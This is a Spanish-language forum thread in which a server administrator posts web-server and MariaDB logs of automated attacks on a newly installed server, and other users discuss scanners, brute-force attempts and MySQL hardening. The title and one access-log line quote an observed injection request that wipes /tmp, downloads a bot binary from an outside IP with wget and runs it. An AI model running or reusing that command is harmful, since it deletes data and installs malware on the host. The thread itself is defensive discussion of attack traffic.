GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86

Iniciado por el-brujo, 19 Diciembre 2020, 12:43 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1 2 3
Acciones del Usuario

el-brujo

19 Diciembre 2020, 12:43 PM
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.

BloodSharp

#1
19 Diciembre 2020, 13:24 PM
Cita de: el-brujo en 19 Diciembre 2020, 12:43 PM
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Ya tan rápido te metieron una shell? Debe ser por Shodan, ZoomEye y otras escaneres alternativos...


B#


@XSStringManolo

#2
19 Diciembre 2020, 17:12 PM
Pasa bastante tiempo entre peticiones y cambia la ip. Es manual?

#!drvy

#3
19 Diciembre 2020, 17:22 PM
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos

@XSStringManolo

#4
19 Diciembre 2020, 17:49 PM
Me pasaba mucho con una red en concreto, pero por lo general en servidores no me llegan peticiones por el estilo.

el-brujo

#5
19 Diciembre 2020, 20:44 PM
Cita de: #!drvy en 19 Diciembre 2020, 17:22 PM
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos

Eso mismo creo yo, son automatizados en busca de nuevas víctimas...

Ya, el Fail2ban no para de trabajar con SSH. Los intentos fallidos de conexión por SSH son todavía más escandalosos... Me parece que llevaba 143 en pocos días.

Un día me dió por mirar las estadísticas de wp-login.php de un WordPress y la cantidad de intentos de entrar era también alarmante. Sobretodo alguna ip que hacía cada día miles de intentos xD

el-brujo

#6
6 Enero 2021, 13:09 PM
Por defecto es un error aceptar conexiones mysql externas.

Durante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Código [Seleccionar]
2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2072 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2080 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2081 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:45 2082 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2083 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2084 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:46 2085 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2086 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:47 2087 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2089 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:48 2090 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:49 2092 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2093 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2094 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:50 2095 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2096 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:51 2097 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2098 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2099 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:52 2100 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2101 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:53 2102 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2103 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2104 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:54 2105 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2106 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:55 2107 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2108 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2109 [Warning] Access denied for user 'moves'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:56 2110 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2111 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2112 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:57 2113 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2114 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:58 2115 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2116 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2117 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:59 2118 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2119 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:00 2120 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2122 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2123 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:01 2124 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2125 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:02 2126 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2127 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2128 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:03 2129 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2130 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2131 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:04 2132 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2133 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:05 2134 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2135 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2136 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:06 2137 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2138 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:07 2139 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2140 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:08 2141 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:08 2142 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2143 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:09 2144 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2145 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2146 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:10 2147 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2148 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2149 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:11 2150 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:12 2151 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:12 2152 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2153 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2154 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:13 2155 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2156 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2157 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:14 2158 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2159 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:15 2160 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2161 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2162 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:16 2163 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2164 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:17 2165 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2166 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2167 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:18 2168 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2169 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2170 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:19 2171 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2172 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:20 2173 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2174 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2175 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:21 2176 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2177 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:39:22 2178 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: NO)
2020-12-15 11:39:22 2179 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 12:42:01 2297 [Note] Hostname 'zg-0915b-171.stretchoid.com' has the following IP addresses:
2020-12-15 12:42:01 2297 [Note]  - 91.126.217.153
2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:36 2445 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2446 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:37 2447 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:38 2448 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:39 2449 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:43 2450 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2452 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:47 2453 [Warning] Access denied for user 'mysql'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:49 2454 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:52 2455 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:54 2456 [Warning] Access denied for user 'test'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:04 2459 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:05 2460 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:07 2461 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:08 2462 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2463 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:11 2464 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:14 2465 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:15 2466 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:16 2467 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2468 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:17 2469 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:18 2470 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:19 2471 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2472 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:20 2473 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2474 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:23 2475 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:26 2476 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2477 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:27 2478 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:28 2479 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:31 2480 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:32 2481 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:33 2482 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:34 2483 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:35 2484 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:36 2485 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2486 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:38 2487 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:39 2488 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:42 2489 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:44 2490 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:45 2491 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:46 2492 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:52 2493 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:55 2494 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:57 2495 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:58 2496 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:00 2498 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:01 2499 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:02 2500 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2501 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:05 2502 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:06 2503 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:08 2504 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:10 2505 [Warning] Access denied for user 'user1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:11 2506 [Warning] Access denied for user 'test1'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:13 2508 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:14 2509 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)

#!drvy

#7
6 Enero 2021, 13:27 PM
CitarDurante unas horas se me olvidó añadir el skip-networking del my.cnf de MariaDB (MySQL)

Siempre recomendable después de instalar mysql-server, ejecutar

Código (bash) [Seleccionar]
mysql_secure_installation

Saludos

Danielㅤ

#8
6 Enero 2021, 14:11 PM Ultima modificación: 6 Enero 2021, 14:34 PM por [D]aniel
Hola, con el tema de intentos de login es como dice drvy!, asignas una IP pública y levantas un servidor y ya aparecen los intentos de login, pero a éstos habría que hacerles una trampa bastante interesante e ingeniosa, algo que sirve perfectamente para intentos de login o brute force.

Cuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor? Es justamente obtener el acceso correcto para ingresar, pero, después de ingresar que es lo que pasa con esos intentos?, simplemente dejan de seguir, dejan de insistir porque obviamente ya consiguieron el acceso.

Lo que se podría hacer es darle ok a todo, cuando un sistema detecta esos intentos, lo que hace es aceptar los login como si fuesen correctos, les hace una trampa y cuando el atacante cree que ya tiene el acceso, simplemente es falso, no lo tiene, pero su sistema automatizado (el del atacante) no sirve para nada, porque todo lo que intente es correcto aunque obviamente son logins falso y no le va a dar acceso de nada, pero de esta forma el atacante queda confundido y se va a dar cuenta de esa medida de seguridad, y que terminara haciendo? abandonando el sitio... lo mismo si es algo automatizado, al aceptar cualquier login ese bot/script se detendrá y los intentos también.

Es un método posiblemente más seguro cuando otros sistemas rechazan todo el tiempo esos miles de login, pero de ésta forma los acepta y los hace creer que tienen acceso cuando en realidad no lo tienen y así no pueden saber cuál es el login correcto, es como los scanners de puertos que pueden hacer creer (que aparezcan abiertos) a los atacantes o sistemas automatizados que x puertos están abiertos cuando verdaderamente están cerrados.


Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

el-brujo

#9
6 Enero 2021, 14:22 PM
Tienes razón #!drvy  olvidé ejecutar el "secure installation" porque copié parte de la config del servidor migrado.

https://mariadb.com/kb/en/mysql_secure_installation/

No tengo ni la base de datos test, ni user anónimo.

Añadí otras opciones básicas de seguridad en el fichero my.cnf

Código [Seleccionar]

#security
local-infile=0
# para poner mysql remoto comentar
skip-networking
#no dns lookups
skip-name-resolve

CitarCuál es el objetivo de la fuerza bruta a un sistema? o que es lo que quieren hacer cuando intentan loguearse con algún nombre de usuario del servidor?

Son ataques automáticos y automatizados seguro. Si usas credenciales débiles o por defecto pues ale, entras a formar parte de una botnet o algo peor.
Imprimir
Ir Arriba Páginas1 2 3
Acciones del Usuario